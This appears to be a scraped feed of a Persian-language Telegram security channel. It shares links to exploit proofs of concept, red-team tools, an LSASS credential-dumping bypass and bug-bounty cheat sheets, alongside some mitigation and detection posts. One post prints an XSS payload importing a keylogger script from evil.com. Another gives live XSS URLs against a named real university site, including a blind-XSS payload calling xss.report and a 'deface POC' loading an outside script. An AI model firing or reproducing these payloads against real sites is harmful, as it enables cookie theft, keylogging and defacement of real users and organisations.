سلام ؛ میزبان ارائه ها و مطالب و محتوای آموزشی شما در راستای ارتقا سطح سواد امنیتی در آیدیفنس هستیم ؛ برای انتشار مطالب و همچنین برای عضویت در تیم های فعال مجموعه با پشتیبانی در ارتباط باشید
@iDeFense_Tester
@iDeFense_Tester
🤝4💯3❤1🤷♂1
@idefense.gif
96.6 MB
🔺 Introduction to Windows Kernel Exploitation
👁🗨 https://wetw0rk.github.io/posts/0x00-introduction-to-windows-kernel-exploitation/
♨️ Killing Windows Kernel Mitigations (Windows 11 pro)
👁🗨 https://wetw0rk.github.io/posts/0x01-killing-windows-kernel-mitigations/
#kernel
#exploit
#Privilege_escalation
@iDeFense
👁🗨 https://wetw0rk.github.io/posts/0x00-introduction-to-windows-kernel-exploitation/
♨️ Killing Windows Kernel Mitigations (Windows 11 pro)
👁🗨 https://wetw0rk.github.io/posts/0x01-killing-windows-kernel-mitigations/
#kernel
#exploit
#Privilege_escalation
@iDeFense
👍2❤🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
‼️وقتی تصمیم می گیرید که فقط رویدادهای امنیتی اساسی رو بررسی کنید...😬
#fun
#SOC
#Critical_Alert
#BlueTeam
@iDeFense
#fun
#SOC
#Critical_Alert
#BlueTeam
@iDeFense
😁8👻1🙈1
🚨 CVE-2024-53677-S2-067🚨
💢 CVSS Score: 9.5 (Critical)
Apache Struts versions 2.0.0 <= 2.5.33 & 6.0.0 <= 6.3.0.2
🛟 The issue has been resolved in Apache Struts 6.4.0 and later versions
‼️ CVE-2024-53677 is a critical vulnerability that allows attackers to exploit weaknesses in the file upload mechanism of Apache Struts. By manipulating the file upload parameters, an attacker can achieve the following:
⚠️ Path Traversal: Upload files to arbitrary locations within the server, bypassing security mechanisms.
⚠️ Remote Code Execution (RCE): Execute malicious code by uploading and triggering executable files, such as .jsp scripts or binary payloads.
🔰 According to the Apache Struts advisory, the vulnerability is not backward-compatible with older file upload mechanisms. As such, organizations using the deprecated file upload method must rewrite their actions to adopt the new, secure mechanism introduced in version 6.4.0.
🔬 POC : https://github.com/TAM-K592/CVE-2024-53677-S2-067
#CVE
#Apache
#RCE
@iDeFense
💢 CVSS Score: 9.5 (Critical)
Apache Struts versions 2.0.0 <= 2.5.33 & 6.0.0 <= 6.3.0.2
🛟 The issue has been resolved in Apache Struts 6.4.0 and later versions
‼️ CVE-2024-53677 is a critical vulnerability that allows attackers to exploit weaknesses in the file upload mechanism of Apache Struts. By manipulating the file upload parameters, an attacker can achieve the following:
⚠️ Path Traversal: Upload files to arbitrary locations within the server, bypassing security mechanisms.
⚠️ Remote Code Execution (RCE): Execute malicious code by uploading and triggering executable files, such as .jsp scripts or binary payloads.
🔰 According to the Apache Struts advisory, the vulnerability is not backward-compatible with older file upload mechanisms. As such, organizations using the deprecated file upload method must rewrite their actions to adopt the new, secure mechanism introduced in version 6.4.0.
🔬 POC : https://github.com/TAM-K592/CVE-2024-53677-S2-067
#CVE
#Apache
#RCE
@iDeFense
GitHub
GitHub - TAM-K592/CVE-2024-53677-S2-067: A critical vulnerability, CVE-2024-53677, has been identified in the popular Apache Struts…
A critical vulnerability, CVE-2024-53677, has been identified in the popular Apache Struts framework, potentially allowing attackers to execute arbitrary code remotely. This vulnerability arises fr...
❤🔥3🤔3🏆1🗿1
عزیزانی که علاقه مند به تولید محتوای ویدیویی و همچنین علاقه مند به پژوهش هستند جهت عضویت در گروه درخواست بدن
@iDeFense_Tester
@iDeFense_Tester
❤7🗿3
iDeFense
عزیزانی که علاقه مند به تولید محتوای ویدیویی و همچنین علاقه مند به پژوهش هستند جهت عضویت در گروه درخواست بدن @iDeFense_Tester
اینبار در شاخه های مختلف(کد نویسی امن ؛ رد تیمینگ ؛ باینری) و مختص اسیب پذیری های وب نیست
🎄6🗿2
😈 [ Eliran Nissan @eliran_nissan ]
I am excited to share with you my latest research - "DCOM Upload & Execute".
An advanced lateral movement technique to upload and execute custom payloads on remote targets.
Forget about PSEXEC and dive in!
Blog:
🔗 https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor
Code:
🔗 https://github.com/deepinstinct/DCOMUploadExec
[ tweet ]
I am excited to share with you my latest research - "DCOM Upload & Execute".
An advanced lateral movement technique to upload and execute custom payloads on remote targets.
Forget about PSEXEC and dive in!
Blog:
🔗 https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor
Code:
🔗 https://github.com/deepinstinct/DCOMUploadExec
[ tweet ]
Deep Instinct
Forget PSEXEC: DCOM Upload & Execute Backdoor
Join Deep Instinct Security Researcher Eliran Nissan as he exposes a powerful new DCOM lateral movement attack that remotely writes custom payloads to create an embedded backdoor.
🔥6
Exploit for Windows Kernel-Mode Driver Elevation of Privilege Flaw (CVE-2024-35250)
This security flaw is due to an untrusted pointer dereference weakness that allows local attackers to gain SYSTEM privileges in low-complexity attacks that don't require user interaction.
This security flaw is due to an untrusted pointer dereference weakness that allows local attackers to gain SYSTEM privileges in low-complexity attacks that don't require user interaction.
👍4
🔖Bug Bounty CheatSheet
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔘 Github: 🔗Link
#pentestin #bugbounty #Tools
@iDeFense
🔴XSS
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴SQLi
🔘 Github: 🔗Link
🔴SSRF
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴CRLF
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴CSV-Injection
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴Command Injection
🔘 Github: 🔗Link
🔴Directory Traversal
🔘 Github: 🔗Link
🔴LFI
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴XXE
🔘 Github: 🔗Link
🔴Open-Redirect
🔘 Github: 🔗Link
🔴RCE
🔘 Github: 🔗Link
🔴Crypto
🔘 Github: 🔗Link
🔴Template Injection
🔘 Github: 🔗Link
🔘 Github: 🔗Link
🔴XSLT
🔘 Github: 🔗Link
🔴Content Injection
🔘 Github: 🔗Link
🔴LDAP Injection
🔘 Github: 🔗Link
🔴NoSQL Injection
🔘 Github: 🔗Link
🔴CSRF Injection
🔘 Github: 🔗Link
🔴GraphQL Injection
🔘 Github: 🔗Link
🔴IDOR
🔘 Github: 🔗Link
🔴ISCM
🔘 Github: 🔗Link
🔴LaTex Injection
🔘 Github: 🔗Link
🔴OAuth
🔘 Github: 🔗Link
🔴XPATH Injection
🔘 Github: 🔗Link
🔴Bypass Upload Tricky
🔘 Github: 🔗Link
#pentestin #bugbounty #Tools
@iDeFense
👍6
♨ AttackRuleMap
🔺 پروژه مپ Atomic Red Team بر روی
🔘 Splunk ESCU ( در حال تکمیل/فعلا ویندوز )
🔘 Sigma Rules
🔗 https://attackrulemap.netlify.app/
#sigma
#Splunk
#ESCU
#BlueTeam
#SOC
@iDeFense
🔺 پروژه مپ Atomic Red Team بر روی
🔘 Splunk ESCU ( در حال تکمیل/فعلا ویندوز )
🔘 Sigma Rules
🔗 https://attackrulemap.netlify.app/
#sigma
#Splunk
#ESCU
#BlueTeam
#SOC
@iDeFense
attackrulemap.netlify.com
ARM - AttackRuleMap
Mapping of open-source detection rules and atomic tests.
❤4
This media is not supported in your browser
VIEW IN TELEGRAM
👁🗨UPDATED
💢 CVE-2024-49112 : Windows Lightweight Directory Access Protocol - Remote Code Execution (AKA : LDAP Nightmare)
( The RCE vulnerability was assigned as CVE-2024-49112 and was given the CVSS severity score of 9.8 out of 10 )
♨️ cve-2024-49113 : the DOS vulnerability was assigned CVE-2024-49113
Windows 10 Version 1607 (both 32-bit and x64-based) up to 10.0.14393.7606
Windows Server 2012
Windows Server 2016
Windows Server 2019
Windows Server 2022
Windows 11 22H2
Windows Server 2022 23H2
Windows 11 24H2
Windows Server 2025
🚩 POC : https://github.com/SafeBreach-Labs/CVE-2024-49112
♨️ Blog : https://www.safebreach.com/blog/ldapnightmare-safebreach-labs-publishes-first-proof-of-concept-exploit-for-cve-2024-49113/
#RCE
#LDAP
#Active_Directory
#CVE
#DOS
@iDeFense
🔥4👍1
🕳 A Simple JS code to keylogger data and send it to the personal server + svg file to send the (document.cookie)
💣 https://github.com/11whoami99/XSS-keylogger
📝 USES :
📚 در یک وبسایت آسیبپذیر xss، ممکن است پارامتر domain یا مشابه آن بهصورت مستقیم در redirect استفاده شود:
مهاجم لینک زیر را میسازد:
#XSS
#Open_Redirect
#keylogger
#web
@iDeFense
💣 https://github.com/11whoami99/XSS-keylogger
📝 USES :
The Keylogger in something like XSS Via OpenRedirect in Login Page :
==> ?domain=javascript%3aimport(//evil.com/xss.js)
📚 در یک وبسایت آسیبپذیر xss، ممکن است پارامتر domain یا مشابه آن بهصورت مستقیم در redirect استفاده شود:
🔬https://example.com/redirect?domain=https://legit-site.com
مهاجم لینک زیر را میسازد:
🔬https://example.com/redirect?domain=javascript:import(//evil.com/xss.js)
#XSS
#Open_Redirect
#keylogger
#web
@iDeFense
GitHub
GitHub - 11whoami99/XSS-keylogger: A Simple JS code to keylogger data and send it to the personal server
A Simple JS code to keylogger data and send it to the personal server - 11whoami99/XSS-keylogger
👍5⚡1
This media is not supported in your browser
VIEW IN TELEGRAM
🔬 پروژه NetAlertX ابزاری برای مانیتورینگ و مدیریت شبکههای WiFi و LAN است که قابلیتهای متعددی را برای نظارت، شناسایی تغییرات، و ایجاد هشدارها ارائه میدهد. این ابزار برای کسانی که میخواهند شبکه خود را از نظر امنیتی و عملکردی رصد کنند مفید است
🔍 https://github.com/jokob-sk/NetAlertX
🔷 بررسی دستگاههای متصل به شبکه (مانند کامپیوترها، موبایلها، دوربینها و غیره)
🔷 شناسایی تغییرات در پورتها یا اتصال دستگاههای جدید
🔷 امکان برنامهریزی برای اسکن دورهای شبکه به منظور شناسایی دستگاههای متصل
🔷 تغییرات در پورتها
🔷 اضافه شدن دستگاههای ناشناس
🔷 سیستم هشدار (Alert) و ...
#Network
#tools
#wifi
@iDeFense
🔍 https://github.com/jokob-sk/NetAlertX
🔷 بررسی دستگاههای متصل به شبکه (مانند کامپیوترها، موبایلها، دوربینها و غیره)
🔷 شناسایی تغییرات در پورتها یا اتصال دستگاههای جدید
🔷 امکان برنامهریزی برای اسکن دورهای شبکه به منظور شناسایی دستگاههای متصل
🔷 تغییرات در پورتها
🔷 اضافه شدن دستگاههای ناشناس
🔷 سیستم هشدار (Alert) و ...
#Network
#tools
#wifi
@iDeFense
👍4👏1
〽️ پروژه LitterBox بهطور خاص برای توسعه و آزمایش تکنیکهای اجتناب از شناسایی و تحلیل رفتار فایلها یا فرآیندها طراحی شده است. هدف اصلی این پلتفرم کمک به متخصصین امنیتی است تا پیلود ها (Payloads) و ابزارهای خود را قبل از اجرای واقعی آزمایش و بهینه کنند
📦 https://github.com/BlackSnufkin/LitterBox
♾️ توسعهدهندگان و متخصصان امنیتی میتوانند از این ابزار بهعنوان یک محیط شبیهسازی (Sandbox) جهت
🔺 روشهای گریز از شناسایی (Evasion Techniques)
🔺 امضاهای شناسایی (Detection Signatures) را ارزیابی کنند
🔺 رفتار بدافزارها را بدون تأثیر بر سیستمهای واقعی بررسی و تحلیل کنند
➕ قابلیت تحلیل ایستا (Static Analysis) و تحلیل پویا (Dynamic Analysis)
🔘 شناسایی فایل با الگوریتمهای هش (MD5، SHA256)
🔘 محاسبه آنتروپی شانن برای تشخیص رمزگذاریها
🔘 تحلیل نوع فایل و شناسایی MIME
🔘 تشخیص نوع فایل PE
🔘 شناسایی معماری ماشین (x86، x64)
🔘 تحلیل تاریخ کامپایل
🔘 طبقهبندی Subsystem
🔘 تشخیص Entry Point
🔘 نقشهبرداری وابستگی DLLهای وارد شده (Import DLL).
📑 تحلیل اسناد آفیس
🔘 تشخیص و استخراج ماکروها
🔘 تحلیل کد VBA و شناسایی محتوای مخفی
✔️ پایش رفتار با اجرا مستقیم فایلها و تحلیل
✔️ بازرسی مناطق حافظه
✔️ تشخیص تزریق فرآیند (Process Hollowing)
✔️ تحلیل تکنیکهای تزریق (Injection Techniques)
✔️ نظارت بر Sleep Patterns
#RedTeam
#Sandboxing
#StaticAnalysis
#PayloadTesting
#DynamicAnalysis
#MalwareAnalysis
#ThreatSimulation
#MalwareDevelopment
#AdvancedThreatAnalysis
@iDeFense
📦 https://github.com/BlackSnufkin/LitterBox
♾️ توسعهدهندگان و متخصصان امنیتی میتوانند از این ابزار بهعنوان یک محیط شبیهسازی (Sandbox) جهت
🔺 روشهای گریز از شناسایی (Evasion Techniques)
🔺 امضاهای شناسایی (Detection Signatures) را ارزیابی کنند
🔺 رفتار بدافزارها را بدون تأثیر بر سیستمهای واقعی بررسی و تحلیل کنند
➕ قابلیت تحلیل ایستا (Static Analysis) و تحلیل پویا (Dynamic Analysis)
🔘 شناسایی فایل با الگوریتمهای هش (MD5، SHA256)
🔘 محاسبه آنتروپی شانن برای تشخیص رمزگذاریها
🔘 تحلیل نوع فایل و شناسایی MIME
🔘 تشخیص نوع فایل PE
🔘 شناسایی معماری ماشین (x86، x64)
🔘 تحلیل تاریخ کامپایل
🔘 طبقهبندی Subsystem
🔘 تشخیص Entry Point
🔘 نقشهبرداری وابستگی DLLهای وارد شده (Import DLL).
📑 تحلیل اسناد آفیس
🔘 تشخیص و استخراج ماکروها
🔘 تحلیل کد VBA و شناسایی محتوای مخفی
✔️ پایش رفتار با اجرا مستقیم فایلها و تحلیل
✔️ بازرسی مناطق حافظه
✔️ تشخیص تزریق فرآیند (Process Hollowing)
✔️ تحلیل تکنیکهای تزریق (Injection Techniques)
✔️ نظارت بر Sleep Patterns
#RedTeam
#Sandboxing
#StaticAnalysis
#PayloadTesting
#DynamicAnalysis
#MalwareAnalysis
#ThreatSimulation
#MalwareDevelopment
#AdvancedThreatAnalysis
@iDeFense
GitHub
GitHub - BlackSnufkin/LitterBox: A secure sandbox environment for malware developers and red teamers to test payloads against detection…
A secure sandbox environment for malware developers and red teamers to test payloads against detection mechanisms before deployment. Integrates with LLM agents via MCP for enhanced analysis capabil...
👍10🙏1
iDeFense
👁🗨UPDATED 💢 CVE-2024-49112 : Windows Lightweight Directory Access Protocol - Remote Code Execution (AKA : LDAP Nightmare) ( The RCE vulnerability was assigned as CVE-2024-49112 and was given the CVSS severity score of 9.8 out of 10 ) ♨️ cve-2024-49113…
🛟 To mitigate the risks associated with CVE-2024-49112, organizations should implement several strategies.
🔰 First, deploy the Microsoft patch for CVE-2024-49112 as soon as possible.
🔰 Second, implement network monitoring to detect suspicious CLDAP referral responses, DsrGetDcNameEx2 calls, and DNS SRV queries.
🔰 Third, enforce access controls by restricting network access to LDAP services and ensuring only trusted devices can communicate with Domain Controllers.
@iDeFense
🔰 First, deploy the Microsoft patch for CVE-2024-49112 as soon as possible.
🔰 Second, implement network monitoring to detect suspicious CLDAP referral responses, DsrGetDcNameEx2 calls, and DNS SRV queries.
🔰 Third, enforce access controls by restricting network access to LDAP services and ensuring only trusted devices can communicate with Domain Controllers.
@iDeFense
🙏4
🌐 پروژه NjForward یک ابزار رایگان و متنباز برای پورت فورواردینگ و ایجاد VPN خصوصی در ویندوز، که امکان ایجاد تونلهای TCP را برای اهداف مختلف (شامل تستهای امنیتی و نیازهای تخصصی شبکه) فراهم میکند...
جایگزینی بهینه و قابلاعتمادتر نسبت به RDP
🕸 https://github.com/ac3ss0r/NjForward/
#PortForwarding
#RedTeam
#tools
#TCPtunneling
@iDeFense
جایگزینی بهینه و قابلاعتمادتر نسبت به RDP
🕸 https://github.com/ac3ss0r/NjForward/
#PortForwarding
#RedTeam
#tools
#TCPtunneling
@iDeFense
👍11
🚩 استفاده از Cloudflared برای ایجاد تونلهای امن و حفظ پایداری در RedTeaming
👁🗨 https://www.youtube.com/watch?v=JC1hIppKLhI
🚩 ابزار تخصصی NetExec (نام جدید پروژه اصلی CrackMapExec ) برای ارزیابی امنیت شبکه و خودکارسازی تستهای نفوذ
👁🗨 https://www.netexec.wiki/
📝 https://github.com/Pennyw0rth/NetExec
#PenetrationTesting
#RedTeam
#tools
#BypassDefense
@iDeFense
👁🗨 https://www.youtube.com/watch?v=JC1hIppKLhI
🚩 ابزار تخصصی NetExec (نام جدید پروژه اصلی CrackMapExec ) برای ارزیابی امنیت شبکه و خودکارسازی تستهای نفوذ
👁🗨 https://www.netexec.wiki/
📝 https://github.com/Pennyw0rth/NetExec
#PenetrationTesting
#RedTeam
#tools
#BypassDefense
@iDeFense
YouTube
Using Cloudflared for Tunneling and Persistence
Discover how to leverage Cloudflared for secure tunneling and persistence, tailored for red team operations. This video walks you through setting up Cloudflared to bypass traditional network defenses, maintain covert access, and streamline your testing. Perfect…
❤8👍1
🔬 Dumping LSASS.exe Process Memory (Windows Defender Bypass 2025)
👁🗨 Video : https://youtu.be/GoxR7W6vjns?si=D9b_rpN4tqRb_0rd
🛠 Tools ==> https://github.com/ricardojoserf/NativeDump
📚 https://ricardojoserf.github.io/nativedump/
🔗 related: https://t.iss.one/iDefense/616
🚩 https://attack.mitre.org/techniques/T1003/001/
#Dump_Lsass
#RedTeam
#NTAPI
#BypassDefense
#Bypass
#Credential_Access
@iDeFense
YouTube
Cyber Security - Dump Windows LSASS.exe Process Memory (Windows Defender Bypass)
Be better than yesterday -
This video demonstrates that it is possible to bypass the latest Windows Defender running on a fully updated Windows computer, successfully dumping the LSASS.exe process memory for credentials harvesting.
DISCLAIMER:
All content…
This video demonstrates that it is possible to bypass the latest Windows Defender running on a fully updated Windows computer, successfully dumping the LSASS.exe process memory for credentials harvesting.
DISCLAIMER:
All content…
❤6
🔻 Cambridge University 🎓
⭕️ Bug : XSS
👁🗨 alert Bug 🤷♀️
👁🗨 blind XSS 🤷♀️
👁🗨 deface POC :
#BUG
#XSS
#vulnerable
#WEB
@iDeFense
⭕️ Bug : XSS
👁🗨 alert Bug 🤷♀️
https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(9155)%3C/ScRiPt%3E
👁🗨 blind XSS 🤷♀️
https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://xss.report/c/{username}%3E%3C/script%3E
👁🗨 deface POC :
https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://jso-tools.z-x.my.id/raw/~/VYHMKG89QIWNM%3E%3C/script%3E
#BUG
#XSS
#vulnerable
#WEB
@iDeFense
👍7👏1
👨💻 OSCP (PWK) Cheat Sheet.
📚 Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP).
- Basics;
- Information Gathering;
- Vulnerability Analysis;
- Web Application Analysis;
- Database Assessment;
- Password Attacks;
- Exploitation Tools;
- Post Exploitation;
- Exploit Databases;
- CVEs;
- Payloads;
- Wordlists;
- Social Media Resources;
- Commands.
#OSCP
#PWK
#CheatSheet
@iDeFense
GitHub
GitHub - 0xsyr0/OSCP: OSCP Cheat Sheet
OSCP Cheat Sheet. Contribute to 0xsyr0/OSCP development by creating an account on GitHub.
🔥3